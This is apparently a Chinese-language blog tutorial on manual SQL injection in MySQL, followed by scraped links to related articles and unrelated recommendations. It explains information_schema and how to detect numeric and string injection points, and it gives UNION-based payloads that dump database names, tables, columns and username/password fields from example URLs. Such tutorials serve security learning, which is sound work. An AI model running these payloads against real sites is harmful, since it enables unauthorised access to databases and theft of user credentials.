写在前面

MYSQL5.0之后的版本,默认在数据库中存放一个information_schema的数据库,其中应该记住里面的三个表SCHEMATA、TABLES、COLUMNS

SCHEMATA表:存储该用户创建的所有数据库的库名,该表中记录数据库名的字段名为:SCHEMA_NAME

TABLES表:存储该用户创建的所有数据库的库名表名,该表中记录数据库库名和表名的宇段名分别为:TABLE SCHEMATABLE_NAME

COLUMNS表:存储该用户创建的所有数据库的库名表名字段名,该表中记录数据库库名、表名和宇段名的字段名为:TABLE SCHEMATABLE NAMECOLUMN NAME

几个函数

  • database():当前网站使用的数据库

  • version():当前MySQL的版本

  • user():当前MySQL的用户

  • concat():将多个字符串连接成一个字符串(语法:concat(str1, str2,...))

  • group_concat():将group by产生的同一个分组中的值连接起来,返回一个字符串结果

几种查询

操作系统信息:

select @@global.version_compile_os from mysql.user

数据库权限:

and ord(mid(user(),1,1))=114  -- 返回正常说明为root

什么是SQL注入

应用程序在向后台数据库传递SQL(结构化查询语句)查询时,如果为攻击者提供了影响该查询的功能,就会引发SQL注入。攻击者通过影响传递给数据库的内容来修改SQL自身的语法和功能,并且会影响SQL所支持数据库和操作系统的功能和灵活性。

可结合试题案例加以理解:https://ne2ha.top/passages/SQLi-Labs-Practice/

数字型注入

即输入的参数为数字型

  • 测试是否存在注入点

以一条SQL查询语句为例:

select * from users where id = 1

上面是正常的一条语句,但是如果攻击者通过构造:id=1',执行下面的语句:

select * from users where id = 1'

这样的SQL语句是错误的,所以执行SQL查询就会报错,返回异常

接着构造:

select * from users where id = 1 and 1=1

SQL语句正常执行,返回正确

然后:

select * from users where id = 1 and 1=2

语句正常执行,但1=2为恒假条件,无法查询出结果,返回异常

满足上面的3点,大概就可以判断存在数字型注入

  • 判断字段数
select * from users where id = 1 order by <数字> -- 后面直接加数字,多个字段排序

比如URL:http://example.com/?id=1 存在数字型输入

构造一:http://example.com/?id=1 order by 9--+ 返回错误

构造二:http://example.com/?id=1 order by 8--+ 返回正确

所以可以得到字段数为8

  • 查找可显示的字段
http://example.com/?id=1 and 1=2 union select 1,2,3,4,5,6,7,8--+
  • 收集信息(假设第6个可以显示数据)
and 1=2 union select 1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version()),7,8-–+

查询当前使用的用户以及数据库名字和版本

  • 查询所有数据库名
and 1=2 union select 1,2,3,4,5,concat(group_concat(distinct+schema_name)),7,8 from information_schema.schemata--+
  • 爆表
and 1=2 union select 1,2,3,4,5,concat(group_concat(distinct+table_name)),7,8 from information_schema.tables where table_schema=0x<数据库名的十六进制>--+
  • 爆字段
and 1=2 union select 1,2,3,4,5,concat(group_concat(distinct+column_name)),7,8 from information_schema.columns where table_name=0x<字段的十六进制>--+
  • 爆字段内容
and 1 =2 union select 1,2,3,4,5,concat(id,0x3a,username,0x3a,password),7,8 from <表名> limit 0,1–-+

说明:idusernamepassword均假设是上述获取到的字段名,0x3a表示感叹号,具体按实际情况来

字符型注入

即输入的参数为字符型,于数字型的区别在于字符型的参数需要单引号闭合

select * from users where username = 'admin'
  • 测试是否存在注入点

加单引号,执行语句

select * from users where username = 'admin''

语句无法执行,返回异常

加上'and 1=1,执行语句

select * from users where username = 'admin' and 1=1'

语句同样是错误的,注释掉后面的单引号

select * from users where username = 'admin' and 1=1-- '

返回结果正常

接着构造:

select * from users where username = 'admin' and 1=2-- '

返回异常

满足上面3点,大概可以判断存在字符型注入

参考

《SQL注入攻击防御》(第二版)

《Web安全攻防:渗透测试实战指南》

https://www.lstazl.com/mysql数字型手工注入/

https://www.cnblogs.com/aq-ry/p/9368619.html

SQL注入的简单认识的更多相关文章

  1. 【sql注入】简单实现二次注入

    [sql注入]简单实现二次注入 本文转自:i春秋社区 测试代码1:内容详情页面 [PHP] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 1 ...

  2. 防止sql注入(简单)

    (1)mysql_real_escape_string -- 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集 使用方法如下: $sql = "select count ...

  3. php 防止sql注入的简单方法

    您可以使用PHP的功能,如函数stripslashes()和addslashes(),mysql_real_escape_string()等,使安全的SQL查询. 以下是安全的SQL语句,使用PHP ...

  4. SQL注入攻防入门详解

    =============安全性篇目录============== 本文转载 毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机 ...

  5. SQL注入攻防入门详解(2)

    SQL注入攻防入门详解 =============安全性篇目录============== 毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱 ...

  6. 转!! PreparedStatement是如何防止SQL注入的

    SQL注入最简单也是最常见的例子就是用户登陆这一模块,如果用户对SQL有一定的了解,同时系统并没有做防止SQL注入处理,用户可以在输入的时候加上'两个冒号作为特殊字符,这样的话会让计算机认为他输入的是 ...

  7. [转]SQL注入攻防入门详解

    原文地址:http://www.cnblogs.com/heyuquan/archive/2012/10/31/2748577.html =============安全性篇目录============ ...

  8. 仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell

    最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填 ...

  9. SQL注入攻击和防御

    部分整理...   什么是SQL注入? 简单的例子, 对于一个购物网站,可以允许搜索,price小于某值的商品 这个值用户是可以输入的,比如,100 但是对于用户,如果输入,100' OR '1'=' ...

随机推荐

  1. cts-verifier测试流程

    测试目的: cts的补充测试,可以理解为没法自动化的cts测试,这个是人工测试. 测试前提: 1.发货user版本 2.selinux:Enable 5.外网环境 设备需求: 2个待测设备:1个手机或 ...

  2. servlet--response、request

    请求响应流程图 response 1       response概述 response是Servlet.service方法的一个参数,类型为javax.servlet.http.HttpServle ...

  3. [BZOJ2138]stone(Hall定理,线段树)

    Description 话说Nan在海边等人,预计还要等上M分钟.为了打发时间,他玩起了石子.Nan搬来了N堆石子,编号为1到N,每堆 包含Ai颗石子.每1分钟,Nan会在编号在\([L_i,R_i] ...

  4. js实现方块弹珠游戏

    下载地址:https://files.cnblogs.com/files/liumaowu/%E5%BC%B9%E4%B8%80%E5%BC%B9%E6%89%93%E6%96%B9%E5%9D%97 ...

  5. .net core 调用webservice同步方法

    更新VS2019 16.1版本 支持WebService同步调用 在连接服务中->选择客户端选项->Generate Synchronout Operations选择划勾   生成同步操作 ...

  6. 任务21 :了解ASP.NET Core 依赖注入,看这篇就够了

    DI在.NET Core里面被提到了一个非常重要的位置, 这篇文章主要再给大家普及一下关于依赖注入的概念,身边有工作六七年的同事还个东西搞不清楚.另外再介绍一下.NET  Core的DI实现以及对实例 ...

  7. <一> idea+gradle+springboot创建项目

    转载自https://windcoder.com/springbootchutan-chuangjianxiangmu 前言 一边学习公司用到的技术,一边重构小程序后端,从而更好的理解公司搭建的框架. ...

  8. SharePoint创建web应用程序,提示密码不正确

    使用版本SharePoint2010: $username="domain\username"$newpassword="xxxxxxxx"stsadm -o ...

  9. win10开机出现两个系统

    1.cmd(Ctrl+R) 2.输入msconfig 3.选引导 4.删除多余的系统(切记不能删错)

  10. PHP-不涉及第三个变量交换两个变量的值

    不涉及第三个变量交换两个变量的值 方法1:使用加减法 <?php $a = 1; $b = 2; $a = $a+$b; $b = $a-$b; $a = $a-$b; printf(" ...